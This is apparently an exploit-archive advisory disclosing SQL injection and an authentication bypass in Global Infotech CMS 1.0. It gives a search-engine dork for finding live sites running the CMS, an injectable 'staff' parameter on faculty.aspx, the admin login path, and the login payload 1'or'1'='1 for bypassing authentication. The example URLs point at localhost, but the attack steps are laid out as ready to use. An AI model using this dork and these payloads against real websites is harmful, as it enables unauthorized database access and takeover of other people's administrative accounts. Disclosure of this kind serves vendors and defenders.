Global Infotech CMS 1.0 SQL Injection

Global Infotech CMS version 1.0 suffers from multiple remote SQL injection vulnerabilities.


SHA-256 | 690c3eec4de3db7e5c8f00b43c3916716e5993c3e6f48d042f2c34961a9a5a1a

====================================================================================================================================
| # Title : Global Infotech cms v 1.0 Sql injectioin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : http://www.globalinfotech.co |
| # Dork : intext:"Powered by : Global Infotech" |
====================================================================================================================================


poc :

[+] Dorking İn Google Or Other Search Enggine

[+] http://127.0.0.1/dhamdhacollegeacin/faculty.aspx?staff=1%27 <===== inject here

[+] login : http://127.0.0.1/dhamdhacollegeacin/admin/

===========================================================================================================================================================================================================================================================================
| # Title : Global Infotech cms v 1.0 Auth by pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : http://www.globalinfotech.co |
| # Dork : intext:"Powered by : Global Infotech" |
====================================================================================================================================


poc :

[+] Dorking İn Google Or Other Search Enggine

[+] Use Payload = user & pass : 1'or'1'='1

[+] http://127.0.0.1/aaravcscdurgcom/admin/Dashboard.aspx

Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================

Related Posts